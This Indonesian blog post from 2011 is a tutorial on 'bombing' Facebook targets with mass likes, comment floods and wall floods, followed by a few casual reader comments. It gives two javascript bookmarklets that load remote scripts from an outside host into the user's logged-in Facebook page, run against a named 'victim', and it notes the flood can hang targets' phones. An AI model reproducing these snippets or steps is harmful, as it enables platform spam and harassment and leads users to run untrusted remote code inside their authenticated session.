Selasa, 08 November 2011

Flood di FACEBOOK | Comment,wall,like BOMBER !!


Pada awalnya ga sengaja ketemu sama yang namanya Like Bomber. setelah di praktekkan buat isengin temen. ternyata asik juga nih, akhirnya browsing-browsing mencari komentar dan wall bomber. setelah dapat triknya dan di praktekkan. Work 100% gann.
Oleh karena itu, Haviz's Blog mau untuk membagikan ilmunya, daripada dipendam sendiri. Langsung aja dahhh.



Yang pertama like bomber

Klik Masuk

Keterangan :
  • Target Username or ID : Ganti dengan ID Facebook anda atau teman anda 
  • Apa itu Username : Username adalah nama di belakang alamat Facebook, misal alamat Facebook saya www.facebook.com/Hafiz.Andriansyah . Tulisan yang berwarna merah adalah Username saya.
  • Sedangkan ID : Bagi yang belum mengganti ID Facebook dengan Username makan akan muncul URL kurang lebih seperti ini https://www.facebook.com/profile.php?id=1000022259631311 .Yang berwarna merah itu adalah ID Facebooknya.
  • Berapa biji ? : Silahkan pilih sesuka anda. Di situ terdapat beberapa pilihan dari 1-1000 jembi (Jembi=Jempol=Like)
  • Jika ingin menyertakan komentar silahkan isi kotak kosong di bawahnya.
3. Klik Serbuuuuu! . Tunggu dan Lihat hasilnya.




Lanjuttt, abiz ini, Komentar Flood


syaratnya :
1. harus udah login ke FB dong 
2. buka target harus bisa dikomentarin, nggak harus friend yang penting bisa berkomentar.
3. posisi halaman yang kebuka.. cuman nongol 1 form komentar, kalo di wall kan form komentar bisa nongol banyak banget . misal di bagian foto, nah itu kan cuman ada 1 form komentar, berarti trik ini bisa dijalankan

nb: kalo di wall orang, yang di flood kotak komentar paling atas
stepnya :
1. copas script ini di url korban terus tekan [enter] di keyboard


javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);
2. masukkan jumlah komen
3. masukkan kalimat komentarnya
4. tunggu kira2 1-5 menit (tergantung jumlah komen + koneksi agan)
5. bisa dicek dengan refresh langsung atau buka tab baru.
Sebenarnya ini adalah pengembangan dari script Flood wall yang selama ini beredar . berhubung sepertinya belum ada yg versi flood komen, jadi ya saya coba2 buat, dan berhasil .
Untuk pengguna blackberry yang mengaktifkan apps fb & fungsi notification aktif, maka akan terjadi hang kalo diserang pake cara ini ataupun wall flood (diatas 50). gw baru nyoba di 2 temen sih, atas ijin si korban )

update : Peringatan : menggunakan cara ini, ada kemungkinan akun FB anda terkena blokir. Dari komentar, dah ada yg kena. gw juga belum tau berapa batasan flood sampai bisa kena blokir. gw nyoba 200 komen sekaligus juga belum diblokir kok 

Wall BOMBER

ini gw kasih scriptnya :
javascript:(a=(b=document).createElement("script")).src="//brk.to/wall",b.body.appendChild(a);void(0);
caranya mirip seperti komentar flood.. paste di url tapi saat berada di halaman wall target.

15 komentar:

  1. bkn keduaxx
    cepet bgt Aulia Rahman

    wah lmayan nih
    dicoba dulu deh
    btw thanks infonya

    BalasHapus
  2. wah keren bgt
    apa lg like bomber
    wkwkwk
    dah dicoba
    bisa jg

    BalasHapus
  3. Kayaknya seru nih Gan. Kalo ada waktu senggang silakan jalan2 ke blog baru saya di
    warta-anyar.blogspot.com

    BalasHapus
  4. Di coba dulu ya sob.

    Oh ya sob, follow sukses no.275 gambar naruto atas nama dokunimus. Follback saya tunggu sob.

    BalasHapus